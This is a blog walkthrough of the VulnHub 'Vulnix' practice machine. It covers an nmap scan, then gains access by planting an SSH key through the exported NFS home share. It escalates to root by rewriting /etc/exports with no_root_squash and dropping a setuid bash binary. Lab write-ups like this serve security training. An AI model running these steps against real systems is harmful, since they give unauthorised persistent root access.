Vulunix - VULNHUB - Linux
Complete walkthrough, of the season content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We can use a couple of tools in order to make this task, ane of them is arp-scan that use request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol as you can see below:
NMAP:
On this step, from the attaker machine we recover information about the open ports and services of out target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.
nmap -sC -sV -n -v -p - 192.168.1.33 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 00:56 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:56
Completed NSE at 00:56, 0.00s elapsed
Initiating NSE at 00:56
Completed NSE at 00:56, 0.00s elapsed
Initiating NSE at 00:56
Completed NSE at 00:56, 0.00s elapsed
Initiating Ping Scan at 00:56
Scanning 192.168.1.33 [2 ports]
Completed Ping Scan at 00:56, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 00:56
Scanning 192.168.1.33 [65535 ports]
Discovered open port 995/tcp on 192.168.1.33
Discovered open port 143/tcp on 192.168.1.33
Discovered open port 993/tcp on 192.168.1.33
Discovered open port 110/tcp on 192.168.1.33
Discovered open port 111/tcp on 192.168.1.33
Discovered open port 25/tcp on 192.168.1.33
Discovered open port 22/tcp on 192.168.1.33
Discovered open port 37893/tcp on 192.168.1.33
Discovered open port 2049/tcp on 192.168.1.33
Discovered open port 46912/tcp on 192.168.1.33
Discovered open port 513/tcp on 192.168.1.33
Discovered open port 38416/tcp on 192.168.1.33
Discovered open port 514/tcp on 192.168.1.33
Discovered open port 47876/tcp on 192.168.1.33
Discovered open port 79/tcp on 192.168.1.33
Discovered open port 512/tcp on 192.168.1.33
Discovered open port 51379/tcp on 192.168.1.33
Completed Connect Scan at 00:56, 2.60s elapsed (65535 total ports)
Initiating Service scan at 00:56
Scanning 17 services on 192.168.1.33
Completed Service scan at 00:59, 156.24s elapsed (17 services on 1 host)
NSE: Script scanning 192.168.1.33.
Initiating NSE at 00:59
Completed NSE at 00:59, 12.38s elapsed
Initiating NSE at 00:59
Completed NSE at 00:59, 1.17s elapsed
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Nmap scan report for 192.168.1.33
Host is up (0.0020s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3?
|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 41209/udp6 mountd
| 100005 1,2,3 45553/udp mountd
| 100005 1,2,3 51379/tcp mountd
| 100005 1,2,3 56771/tcp6 mountd
| 100021 1,3,4 37893/tcp nlockmgr
| 100021 1,3,4 44447/tcp6 nlockmgr
| 100021 1,3,4 45234/udp nlockmgr
| 100021 1,3,4 50152/udp6 nlockmgr
| 100024 1 38416/tcp status
| 100024 1 40861/tcp6 status
| 100024 1 43135/udp status
| 100024 1 49746/udp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
|_ssl-date: 2021-08-22T22:59:50+00:00; +2s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
37893/tcp open nlockmgr 1-4 (RPC #100021)
38416/tcp open status 1 (RPC #100024)
46912/tcp open mountd 1-3 (RPC #100005)
47876/tcp open mountd 1-3 (RPC #100005)
51379/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
NSE: Script Post-scanning.
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Initiating NSE at 00:59
Completed NSE at 00:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.79 seconds
The conclusion of nmap scan is that we found the following open ports with the services:
EXPLOITATION:
22/tcp ssh Test
ssh root@192.168.1.33
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:8
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.1.33"
ECDSA host key for 192.168.1.33 has changed and you have requested strict checking.
Host key verification failed.
NFS-Exploitation
For the NFS exploitation, we can follow the next procedure defined by steps:
showmount -e 192.168.1.33
Export list for 192.168.1.33:
/home/vulnix *
1. Generate new local user : vulnix
cat /etc/passwd | grep vulnix
vulnix:x:2008:2008::/home/vulnix:/bin/sh
**** you should know how to create a new user on your attacker machine (man useradd)
2. Using ssh-keygen in order to create a new local key pair (public and private key for ssh with RSA authentication)
su - vulnix
Contraseña:
$ bash
vulnix@kali:~$ pwd
/home/vulnix
vulnix@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa):
Created directory '/home/vulnix/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/vulnix/.ssh/id_rsa
Your public key has been saved in /home/vulnix/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2CRMZ7IqD2D0B/vUe/OzZIX39oBIB7TqshgmRVshfhU vulnix@kali
The key's randomart image is:
+---[RSA 3072]----+
| . .. + E.. |
|. ..o+.B . . |
|.. ooo*.. o |
|.. .+= =.. .. |
| o +...So...o |
| = ...ooo.. |
| . + . . .=. .o |
| o o o o o ...|
| . . . .|
+----[SHA256]-----+
3. Modify public key of id_rsa.pub file to authorized_keys file for allow user connections without password authentication to attacker machine and stored it on /home/vulnix/.ssh path :
vulnix@kali:~/.ssh$ mv id_rsa.pub authorized_keys
vulnix@kali:~/.ssh$ ls -ltrh
total 12K
-rw------- 1 vulnix vulnix 2,6K ago 23 11:54 id_rsa
-rw-r--r-- 1 vulnix vulnix 565 ago 23 11:54 authorized_keys
-rw-r--r-- 1 vulnix vulnix 222 ago 23 11:59 known_hosts
4. Using NfsSpy tool that allow mount and manipulate the data content of nfs/ shared filesystem:
git clone https://github.com/bonsaiviking/NfSpy.git
Clonando en 'NfSpy'...
remote: Enumerating objects: 399, done.
remote: Total 399 (delta 0), reused 0 (delta 0), pack-reused 399
Recibiendo objetos: 100% (399/399), 99.07 KiB | 1.08 MiB/s, listo.
Resolviendo deltas: 100% (218/218), listo.
sudo PYTHONPATH=. python scripts/nfspysh -o server=192.168.1.33:/home/vulnix
[sudo] password for kali:
nfspy@192.168.1.33:/home/vulnix:/> ls
/:
040750 2008 2008 4096 2021-08-23 02:34:14 .
100644 2008 2008 220 2012-04-03 17:58:14 .bash_logout
040755 2008 2008 4096 2021-08-23 02:34:36 .ssh
100644 2008 2008 675 2012-04-03 17:58:14 .profile
040750 2008 2008 4096 2021-08-23 02:34:14 ..
100644 2008 2008 3486 2012-04-03 17:58:14 .bashrc
nfspy@192.168.1.33:/home/vulnix:/> cd .ssh
5. Put the content of authorized_keys on the same path in the shared filesystem /home/vulnix/.ssh:
put /home/vulnix/.ssh/authorized_keys
nfspy@192.168.1.33:/home/vulnix:/.ssh> ls -ltrh
No such file or directory
nfspy@192.168.1.33:/home/vulnix:/.ssh> ls
/.ssh:
040755 2008 2008 4096 2021-08-23 07:22:12 .
100644 2008 2008 565 2021-08-23 07:22:12 authorized_keys
040750 2008 2008 4096 2021-08-23 02:34:14 ..
100644 2008 2008 565 2021-08-23 07:15:45 id_rsa.pub
File content:
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBIVl8fAdsBPmMaPIxuN9r9r24NSnmpMdY1MhGKHYy840aomOxPUJRt2+bKh+nAqHpa1zW5+P4x0R5UEBxm4RLaxPmFySp7oqcjbf2EOYyHpxt1oT1p5B0PdXAA4KBHXq19GQMh6pjyrh9qSzHpGogVLfCg2/Hi2Mr4MFJWNmSB8oVvNPa5XJLY6rNDqU00YZy4m7pFWU7vr/EKwbdSBVby9htJuqEQixoltQ51ZcjGe3Es30Dk4juRbjQGrAuvoXMIRMa64znFs8rJgNHuiy1pwqfL7iSK52VWzikYhPANfF7lWyAtBpgcDmfAve0xXXnXJ4zxJjBZttgiqL5Jp2OKmzfWXYGctmCUhhrJ5geV1nmYDD6W4ehphrf4SnZZol6GjygAPlObQHE3L8MRh40M51xf7a1s5O9CEpLXSCssVrSQ9Ks8T+32QrpaCq8SHwCrHUh2kAY5a0qufOuqbOwmZr0B79+P17aIs2ahA5dFUD/6Waat9f4B41XcduO2mc= vulnix@kali
6. SSH connection.
Using ssh connection with user vulnix, from the attacker machine to target server, (launched process with local vulnix user ssh vulnix@192.168.1.33):
PRIVILEGE ESCALATION:
We should review sudo permissions for vulnix user:
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
And we found that the system allow execute the following command with root privileges, to vulnix user:
sudoedit /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
The root_squash option , don't allow modification with root privileges on external filesystem.
But we can modify the configuration file: /etc/exports with root privileges.
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
#/home/vulnix *(rw,no_root_squash)
/ *(rw,no_root_squash)
On the attacker machine, we can mount the nfs filesystem such a partition over our local Operating System.
root@kali:/mnt# mkdir /mnt/vulnix
root@kali:/mnt# mount.nfs 192.168.1.33:/ /mnt/vulnix/
root@kali:/mnt# cd vulnix/
root@kali:/mnt/vulnix# ls -ltrh
total 4,0K
drwxr-xr-x 4 nobody 4294967294 4,0K sep 2 2012 home
And with the prvious configuration (/ *(rw,no_root_squash)), If you copy the bash binary file from attacker machine with root user ,
the target machine 'll understand that the local owner of the binary file is root too.
root@kali:/mnt/vulnix/home/vulnix# cp /tmp/bash .
So we can assign suid execution privileges on the new bash binary, this privilege allow the execute user make the operation with the owner binary file privileges in that case root:
root@kali:/mnt/vulnix/home/vulnix# chmod 4777 bash
And on the target machine we exploit suid with ./bash -p
And this is all for this lab machine, I hope that you enjoy with the Linux server and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.
with kind regards, f0ns1
No comments:
Post a Comment